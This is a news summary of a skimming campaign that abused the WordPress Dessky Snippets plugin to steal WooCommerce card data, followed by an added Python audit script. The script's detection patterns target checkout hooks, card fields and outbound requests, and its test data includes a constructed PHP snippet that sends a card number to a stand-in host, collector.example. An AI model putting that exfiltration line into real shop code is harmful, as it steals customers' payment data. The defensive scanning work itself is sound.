WordPress Plugin Exploited to Steal Credit Card Data from E-commerce Sites

May 28, 2024 at 02:45AM

Unknown threat actors are exploiting WordPress’s Dessky Snippets plugin, with over 200 active installations, to insert PHP credit card skimming malware into compromised sites. The malware manipulates WooCommerce’s checkout process to steal credit card details, exfiltrating them to a specific URL. This underscores the need for WordPress site owners, especially e-commerce operators, to prioritize security measures like password strength, regular audits, and plugin updates.

Key takeaways:

– Threat actors are exploiting lesser-known code snippet plugins for WordPress to insert malicious PHP code in victim sites, compromising credit card data.
– The campaign abuses the WordPress plugin “Dessky Snippets” to insert server-side PHP credit card skimming malware on compromised sites.
– The malware is designed to modify the checkout process in WooCommerce by injecting its own code and exfiltrating credit card details to a specified URL.
– The billing form associated with the malware has its autocomplete attribute disabled, so users enter sensitive information without the browser warning them, which reduces suspicion.
– Previous instances have revealed the abuse of legitimate code snippet plugins for malicious purposes, highlighting the need for site owners, especially e-commerce sites, to keep their plugins up to date, use strong passwords, and regularly audit for signs of malware or unauthorized changes.
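One way to carry out the audit recommended above, as an added example that is not from the original article: a heuristic scan of snippet bodies for the behaviours the summary describes (checkout hooks, card fields, outbound requests, autocomplete disabled). The indicator patterns, function names and sample snippets are assumptions constructed for illustration, and the snippet sources are assumed to have been exported from the site by its administrator.

```python
import re

# Heuristic indicator groups (assumed for this example, not taken from the malware).
INDICATORS = {
    "checkout_hook": re.compile(
        r"add_(?:action|filter)\s*\(\s*['\"]woocommerce_[a-z_]*checkout[a-z_]*['\"]", re.I),
    "card_fields": re.compile(
        r"\$_(?:POST|REQUEST)\s*\[\s*['\"][^'\"]*(?:card|cc_|cvv|cvc|expir)[^'\"]*['\"]", re.I),
    "outbound_request": re.compile(
        r"\b(?:curl_exec|wp_remote_(?:post|get|request)|file_get_contents|fsockopen)\s*\(", re.I),
    "autocomplete_off": re.compile(r"autocomplete\s*=\s*\\?['\"]off\\?['\"]", re.I),
    "obfuscation": re.compile(r"\b(?:eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}

def audit_snippet(php_source):
    """Return the sorted names of all indicators found in one snippet body."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(php_source))

def is_suspicious(hits):
    """Flag code that touches checkout or card fields AND sends data off-site."""
    touches_payment = "checkout_hook" in hits or "card_fields" in hits
    return touches_payment and "outbound_request" in hits

def audit_all(snippets):
    """Map snippet name -> indicator hits, keeping only suspicious snippets."""
    report = {}
    for name, source in snippets.items():
        hits = audit_snippet(source)
        if is_suspicious(hits):
            report[name] = hits
    return report

# Constructed sample snippets (not real site data, not the actual malware).
SAMPLE_SNIPPETS = {
    "footer-note": "add_action('wp_footer', function () { echo '<p>Thanks!</p>'; });",
    "rename-checkout-label": "add_filter('woocommerce_checkout_fields', 'shop_rename_label');",
    "constructed-skimmer-like": (
        "add_action('woocommerce_checkout_process', 'hypothetical_cb');\n"
        "echo '<input name=\"card_number\" autocomplete=\"off\">';\n"
        "$n = $_POST['card_number'];\n"
        "wp_remote_post('https://collector.example/', array('body' => $n));\n"
    ),
}

if __name__ == "__main__":
    for name, hits in audit_all(SAMPLE_SNIPPETS).items():
        print(f"REVIEW {name}: {', '.join(hits)}")
```

Legitimate payment gateway code can match the same combination, so a hit marks a snippet for manual review against the list of snippets the site owner actually created.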